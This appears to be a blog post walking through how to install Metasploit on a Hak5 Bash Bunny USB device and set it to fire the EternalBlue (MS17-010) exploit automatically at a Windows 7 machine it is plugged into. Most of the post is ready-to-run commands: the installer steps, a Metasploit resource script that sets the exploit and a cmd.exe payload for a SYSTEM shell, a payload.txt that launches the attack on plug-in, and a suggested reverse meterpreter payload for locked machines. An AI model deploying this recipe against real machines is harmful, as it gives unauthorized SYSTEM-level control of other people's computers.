Bashbunny with Metasploit ms17_010_eternalblue vs. Windows 7 SP1 x64

I have finally got the Bashbunny from HAK5, and I can say this is really an Imperial Star Destroyer compared to the Teensy++ 2.0  A-Wing that I have used 6 years ago.

Bashbunny is capable of running Metasploit framework as it has 512 MB RAM and an ARMv7 CPU (v7l) and internal 3 GB flash storage.

Eternalblue exploit that has been ported to Metasploit framework is an ideal candidate for the Bashbunny automatic exploitation. A true hacking device :)

So lets first prepare the Bashbunny device (make sure you can ssh to the device and set internet connection sharing – setup is covered here)  (( I have done all the setup on a linux system))

We need to prepare a couple of things in order to be able to run Metasploit on the Bashbunny so here are the rough steps I have done

Make sure to set some date for TLS/SSL to work ;) 

# date -s "20170523"

Add this to /etc/apt/sources.list 
deb http://http.us.debian.org/debian/ jessie-updates main 
# apt-get update
# apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl wget xsel zlib1g zlib1g-dev

# curl -sSL https://get.rvm.io | bash -s stable
# source /etc/profile.d/rvm.sh 
# rvm requirements
# rvm list known
# rvm install 2.3.3
# vi /root/.bashrc 
Add at the end 
source /etc/profile/rvm.sh
rvm use 2.3.3 --default 


# mkdir /root/METASPLOIT
# cd /root/METASPLOIT/
# wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh
# chmod +x msf_vps_installer.sh 
# ./msf_vps_installer.sh 
# git config --global user.name "USER"
# git config --global user.email "user@example.com"
# ./msfupdate

You should be able to run Metasploit on the Bashbunny now

Now that we have a working Metasploit on the Bashbunny all that is really needed is to arm it and load the eternalblue exploit via an RC metasploit script, here is an example script eternal-cmd.rc   (Remote IP is a default that DHCPD will assign to the target system that you connect the Bashbunny to)

Check the /etc/dhcp/dhcpd.conf   range 172.16.64.10  172.16.64.12 and set to only one value range 172.16.64.64  172.16.64.64

use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/exec
set RHOST 172.16.64.64
set CMD cmd.exe
exploit

The above is ideal when we want to get a NT SYSTEM/AUTHORITY shell on the target Windows 7 SP1 x64 (unlocked)

If the target is locked we can use another payload such as :

(Something like windows/x64/meterpreter/reverse_https  would be ideal as we already know the the LHOST value already for the Bashbunny

So RHOST would be again 172.16.64.64 and LHOST 172.16.64.1  … This can be easily scripted via Metasploit RC script so ;)

The Metasploit RC scripts should be placed in the /root/metasploit-framework on the Bashbunny so we can call it from the PAYLOAD.TXT for the corresponding Attach Switch position .

So ideally this would look like this (switch1 or switch 2)  payload.txt

#!/bin/bash
LED SETUP 
ATTACKMODE RNDIS_ETHERNET 
#Set some current time ..... check your watch 
date -s "20170523 23:23" 
LED ATTACK 
/root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc & 
LED FINISH

The target Windows 7 should have an accessible SMB port 445 from the USB network that Bashbunny device create. Default Windows system has a firewall on so the attack wont work as the port is blocked. For the demonstration purpose we assume there is no firewall on ..

After a while you should get a NT AUTHORITY\ SYSTEM cmd shell pop up on your Win 7 desktop :)

This is a nmap scan after the successful Eternalblue attack on the target Windows 7

Host is up, received arp-response (0.0014s latency).
Scanned at 2017-05-23 23:09:43 for 149s
Not shown: 990 closed ports
Reason: 990 resets
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 128 Microsoft Windows 7 - 10 microsoft-ds
5357/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49156/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49157/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC

Here is a short demo (done via VirtualBox that simulates the actual Bashbunny attack)

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s